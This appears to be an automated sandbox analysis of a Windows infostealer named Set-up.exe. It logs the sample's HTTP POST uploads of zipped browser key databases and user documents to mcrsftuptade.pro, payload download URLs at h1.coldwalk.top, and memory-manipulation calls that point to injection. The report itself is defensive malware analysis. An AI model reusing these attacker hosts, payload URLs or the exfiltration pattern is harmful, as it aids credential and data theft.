00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Source: global trafficHTTP traffic detected: POST /Up/b HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 524954Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 62 2f 67 31 2f 30 2f 6b 65 79 33 2e 64 62 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 f5 ac e0 c4 00 80 04 00 00 80 04 00 0e 00 00 00 62 2f 67 31 2f 30 2f 6b 65 79 34 2e 64 62 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 80 00 01 01 00 40 20 20 00 00 00 02 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 2e 6a d0 0d 7f f8 00 08 7a 3c 00 7b ee 7f c3 7b a9 7b 61 7b 1f 7a db 7a 3c 7a aa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Source: global trafficHTTP traffic detected: POST /Up/g HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 14506Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 95 6c 05 f3 30 00 00 00 30 00 00 00 28 00 00 00 66 31 35 37 35 62 36 34 2d 38 34 39 32 2d 34 65 38 62 2d 62 31 30 32 2d 34 64 32 36 65 38 63 37 30 33 37 31 2e 74 78 74 31 37 34 36 38 35 37 31 33 32 39 32 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 95 fa 9e d0 02 04 00 00 02 04 00 00 32 00 00 00 67 2f 55 73 65 72 73 2f 6a 6f 6e 65 73 2f 44 6f 63 75 6d 65 6e 74 73 2f 41 46 57 41 41 46 52 58 4b 4f 2f 41 46 57 41 41 46 52 58 4b 4f 2e 64 6f 63 78 41 46 57 41 41 46 52 58 4b 4f 49 4d 59 55 54 45 42 4b 4c 43 46 59 55 53 4d 50 4b 42 4c 4c 56 4c 59 43 5a 53 42 59 51 41 52 52 42 49 44 4e 4d 59 4c 50 4c 47 41 49 4a 59 42 50 58 5a 52 52 43 44 4b 57 55 4a 43 5a 46 4e 5a 59 57 4a 4c 4a 57 43 50 50 4e 57 4e 42 55 4e 55 4b 57 4b 41 4e 41 46 4a 54 47 53 4d 4e 44 4e 41 49 50 57 59 43 43 55 47 5a 54 57 43 58 49 44 55 48 4c 4b 44 49 49 46 58 56 5a 5a 43 42 4b 54 4b 5a 58 4b 59 42 46 51 48 4c 48 41 5a 53 50 41 59 4e 56 51 56 43 4e 47 50 54 5a 4c 46 41 46 58 41 55 47 49 53 49 53 41 49 49 54 54 45 55 50 4e 58 4c 57 42 50 41 55 53 43 57 4f 58 48 52 55 43 48 4b 45 4e 48 49 55 48 51 43 53 45 54 43 52 49 4e 42 42 4a 43 55 4a 43 59 49 4f 59 5a 55 50 42 4a 58 4a 42 4c 4d 53 54 43 4d 58 48 4d 4f 4f 59 48 4b 53 51 47 54 47 55 4e 4c 45 44 50 4d 43 46 44 4b 57 44 47 4f 53 4d 57 59 51 4e 58 44 43 41 4f 50 41 47 5a 4c 50 4b 58 51 5a 41 4f 48 53 4a 58 59 4c 4a 55 43 5a 47 41 58 4f 4a 4f 45 50 43 57 42 48 47 47 4b 53 41 50 4c 52 43 4a 52 44 4b 43 49 57 47 41 54 5a 5a 4c 53 41 4f 58 46 50 46 49 45 4e 48 46 5a 43 43 45 5a 43 47 47 59 41 4a 45 45 50 4a 46 4a 4c 51 49 4d 50 59 55 55 45 54 4a 4a 46 4f 47 47 4b 4b 4a 4b 46 41 48 50 52 4d 43 55 4a 4e 44 47 54 58 4d 4c 41 41 51 44 47 45 51 4d 44 55 4c 57 44 50 43 41 55 58 5a 54 59 59 47 4b 41 46 46 51 51 48 49 4b 51 48 45 41 54 55 4a 5a 45 43 4d 50 54 45 42 54 52 48 43 46 47 49 5a 57 43 59 47 49 47 48 49 50 56 57 46 54 50 50 58 53 4e 55 54 59 48 51 43 4c 47 4a 4c 55 59 48 48 56 4d 47 46 4f 4d 48 4a 44 4e 52 47 44 5a 46 48 52 47 59 51 4f 52 54 41 4a 57 4c 47 4f 45 4c 59 4b 43 50 49 41 4e 51 47 43 41 58 49 5a 4f 4d 4a 5a 4f 45 43 5a 47 41 48 46 57 4e 55 41 4b 4b 54 48 4c 41 41 4e 52 42 55 53 4f 5a 5a 4c 4e 57 55 59 4d 58 44 4f 57 50 59 55 46 59 42 4f 5a 5a 5a 42 42 4a 4b 50 4e 4d 46 47 55 43 42 4f 55 57 54 58 58 57 53 4e 4f 42 48 4b 43 50 4c 47 49 57 53 57 48 48 4e 43 4b 4c 4c 4c 50 50 42 50 52 4a 54 4b 47 52 57 4d 49 5a 4a 59 4c 57 4d 44 56 57 47 4a 4f 54 55 51 4c 59 56 55 47 55 4a 51 57 4e 5a 4b 45 55 5a 51 43 51 48 4b 54 43 4d 47 58 42 5a 44 57 45 45 46 57 59 51 48 53 59 45 4d 57 46 46 56 4a 55 44 4f 46 45 58 45 4c 4a 47 55 55 4e 58 50 42 4a 43 49 51 42 4b 43 4d 44 47 44 52 4e 54 58 59 41 58 46 44 53 4c 50 41 47 58 42 54 47 42 49 56 46 58 41 48 4e 58 53 46 49 5
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: unknownTCP traffic detected without corresponding DNS query: 188.114.96.3
            Source: global trafficHTTP traffic detected: GET /ujs/f1575b64-8492-4e8b-b102-4d26e8c70371 HTTP/1.1Host: mcrsftuptade.proConnection: close
            Source: unknownHTTP traffic detected: POST /Up HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 289Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 4e 27 f4 29 6f 00 00 00 6f 00 00 00 28 00 00 00 66 31 35 37 35 62 36 34 2d 38 34 39 32 2d 34 65 38 62 2d 62 31 30 32 2d 34 64 32 36 65 38 63 37 30 33 37 31 2e 74 78 74 7b 22 6c 22 3a 22 31 37 34 36 38 35 37 31 33 32 39 32 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 2c 22 62 74 22 3a 22 47 41 53 22 2c 22 68 69 22 3a 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 7d 50 4b 01 02 14 00 14 00 00 00 00 00 5c 64 21 52 4e 27 f4 29 6f 00 00 00 6f 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 66 31 35 37 35 62 36 34 2d 38 34 39 32 2d 34 65 38 62 2d 62 31 30 32 2d 34 64 32 36 65 38 63 37 30 33 37 31 2e 74 78 74 50 4b 05 06 00 00 00 00 01 00 01 00 56 00 00 00 b5 00 00 00 00 00 Data Ascii: PK\d!RN')oo(f1575b64-8492-4e8b-b102-4d26e8c70371.txt{"l":"1746857132929e146be9-c76a-4720-bcdb-53011b87bd06","bt":"GAS","hi":"9e146be9-c76a-4720-bcdb-53011b87bd06"}PK\d!RN')oo(f1575b64-8492-4e8b-b102-4d26e8c70371.txtPKV
            Source: Set-up.exe, 00000000.00000003.1420210045.0000000010385000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1553562675.000000001016D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1440653499.00000000102F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: Set-up.exe, 00000000.00000003.1420210045.0000000010385000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1553562675.000000001016D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1440653499.00000000102F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: Set-up.exe, 00000000.00000003.1420210045.0000000010385000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1553562675.000000001016D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1440653499.00000000102F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: Set-up.exe, 00000000.00000003.1420210045.0000000010385000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1553562675.000000001016D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1440653499.00000000102F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: Set-up.exe, 00000000.00000003.1420210045.0000000010385000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1553562675.000000001016D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1440653499.00000000102F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: Set-up.exe, 00000000.00000003.1420210045.0000000010385000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1553562675.000000001016D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1440653499.00000000102F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: Set-up.exe, 00000000.00000003.1420210045.0000000010385000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1553562675.000000001016D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1440653499.00000000102F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: Set-up.exe, 00000000.00000002.1544669791.0000000004100000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://h1.coldwalk.top/amshm.bin
            Source: Set-up.exe, 00000000.00000002.1544669791.0000000004100000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://h1.coldwalk.top/sh.ext.exe.bin
            Source: Set-up.exe, 00000000.00000002.1544669791.0000000004100000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://h1.coldwalk.top/shark.bin
            Source: Set-up.exe, 00000000.00000003.1420210045.0000000010385000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1553562675.000000001016D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1440653499.00000000102F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: Set-up.exe, 00000000.00000003.1420210045.0000000010385000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1553562675.000000001016D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1440653499.00000000102F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: Set-up.exeString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
            Source: Amcache.hve.12.drString found in binary or memory: http://upx.sf.net
            Source: Set-up.exeString found in binary or memory: http://www.adremsoft.com/autoupdate/wmi.tools.json
            Source: Set-up.exeString found in binary or memory: http://www.adremsoft.com/autoupdate/wmi.tools.jsonSVWU
            Source: Set-up.exeString found in binary or memory: http://www.indyproject.org/
            Source: Set-up.exe, 00000000.00000000.1241274498.0000000001A31000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.mygale.org/~cresto/
            Source: Set-up.exe, 00000000.00000000.1241274498.0000000001A31000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.netcrunch.tools/wmitool/
            Source: Set-up.exe, 00000000.00000003.1420210045.0000000010385000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1553562675.000000001016D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1440653499.00000000102F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: Set-up.exe, 00000000.00000003.1420210045.0000000010385000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1553562675.000000001016D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1440653499.00000000102F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: chrome.exe, 00000014.00000002.1502764149.000001AD16C2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
            Source: chrome.exe, 00000014.00000002.1502764149.000001AD16C2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: Set-up.exe, 00000000.00000003.1513427342.00000000101B8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1505147370.00000000102A8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1513181542.0000000010278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000002.1502764149.000001AD16C2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: Set-up.exe, 00000000.00000003.1513427342.00000000101B8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1505147370.00000000102A8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1513181542.0000000010278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000002.1502764149.000001AD16C2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: chrome.exe, 00000014.00000002.1502764149.000001AD16C2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: Set-up.exe, 00000000.00000003.1513427342.00000000101B8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1505147370.00000000102A8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1513181542.0000000010278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000002.1502764149.000001AD16C2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
            Source: chrome.exe, 00000014.00000002.1502764149.000001AD16C2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: chrome.exe, 00000014.00000002.1502764149.000001AD16C2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
            Source: Set-up.exe, 00000000.00000003.1513427342.00000000101B8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1505147370.00000000102A8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1513181542.0000000010278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000002.1502764149.000001AD16C2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
            Source: Set-up.exe, 00000000.00000003.1513427342.00000000101B8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1505147370.00000000102A8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1513181542.0000000010278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000002.1502764149.000001AD16C2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
            Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_01FD1EBC NtProtectVirtualMemory,0_2_01FD1EBC
            Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_01FD1E7E NtFreeVirtualMemory,0_2_01FD1E7E
            Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_01FD1E2B NtAllocateVirtualMemory,0_2_01FD1E2B
            Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_01FF11E5 CreateThread,malloc,NtClose,free,0_2_01FF11E5
            Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_01FF0B72 NtGetContextThread,NtSetContextThread,NtResumeThread,0_2_01FF0B72
            Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_01FF0CD8 NtAllocateVirtualMemory,0_2_01FF0CD8
            Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_01FF066E NtProtectVirtualMemory,0_2_01FF066E
            Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_01FF19C5 free,NtClose,free,0_2_01FF19C5
            Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_01FF114C NtClose,0_2_01FF114C
            Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_01FF10E8 NtClose,0_2_01FF10E8
            Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_01FF1084 NtClose,0_2_01FF1084
            Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_03F884E0 NtWow64QueryInformationProcess64,NtWow64ReadVirtualMemory64,NtWow64ReadVirtualMemory64,NtWow64ReadVirtualMemory64,NtWow64ReadVirtualMemory64,0_2_03F884E0
            Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_03F886C0 NtWow64ReadVirtualMemory64,NtWow64ReadVirtualMemory64,NtWow64ReadVirtualMemory64,NtWow64ReadVirtualMemory64,NtWow64ReadVirtualMemory64,NtWow64ReadVirtualMemory64,NtWow64ReadVirtualMemory64,0_2_03F886C0
            Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_03F88419 NtResumeThread,0_2_03F88419
            Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_01FD04210_2_01FD0421
            Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_01FD00000_2_01FD0000
            Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_03F886C00_2_03F886C0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7260 -s 144
            Source: Set-up.exeStatic PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
            Source: Set-up.exeStatic PE information: Number of sections : 11 > 10
            Source: Set-up.exe, 00000000.00000000.1241274498.0000000001CDB000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: pdOriginalFilename vs Set-up.exe
            Source: Set-up.exe, 00000000.00000000.1236851204.0000000000E4C000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: pdOriginalFilename vs Set-up.exe
            Source: Set-up.exe, 00000000.00000000.1236851204.0000000000E4C000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename vs Set-up.exe
            Source: Set-up.exe, 00000000.00000000.1241274498.0000000001CFA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNCWmiToolsF vs Set-up.exe
            Source: Set-up.exe, 00000000.00000000.1241274498.0000000001A31000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: pdOriginalFilename vs Set-up.exe
            Source: Set-up.exeBinary or memory string: pdOriginalFilename vs Set-up.exe
            Source: Set-up.exeBinary or memory string: OriginalFilename vs Set-up.exe
            Source: Set-up.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, DEBUG_STRIPPED, BYTES_REVERSED_HI
            Source: Set-up.exeBinary string: IThe supplied device path "%0:s" is invalid. Is must start with "\DEVICE\"
            Source: Set-up.exeBinary string: \DEVICE\
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@15/25@0/1
            Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_01FD0B31 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,CloseHandle,0_2_01FD0B31
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeCode function: 8_2_0000000140001130 LoadLibraryA,CoInitializeEx,allocator,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,CoCreateInstance,8_2_0000000140001130
            Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7260
            Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3888
            Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1692
            Source: C:\Windows\System32\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\216e9a2c-3701-4619-8adc-8a68c3ac33d5Jump to behavior
            Source: Yara matchFile source: Set-up.exe, type: SAMPLE
            Source: Yara matchFile source: 00000000.00000000.1236851204.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Set-up.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Set-up.exe, 00000000.00000000.1236851204.0000000000E4C000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: SELECT RDB$FIELD_NAME,RDB$FIELD_POSITION FROM RDB$INDEX_SEGMENTS WHERE RDB$INDEX_NAME = ( SELECT RDB$INDEX_NAME FROM RDB$RELATION_CONSTRAINTS WHERE RDB$RELATION_NAME = '%s' AND RDB$CONSTRAINT_TYPE = 'PRIMARY KEY' ) ORDER BY RDB$FIELD_POSITION;SV
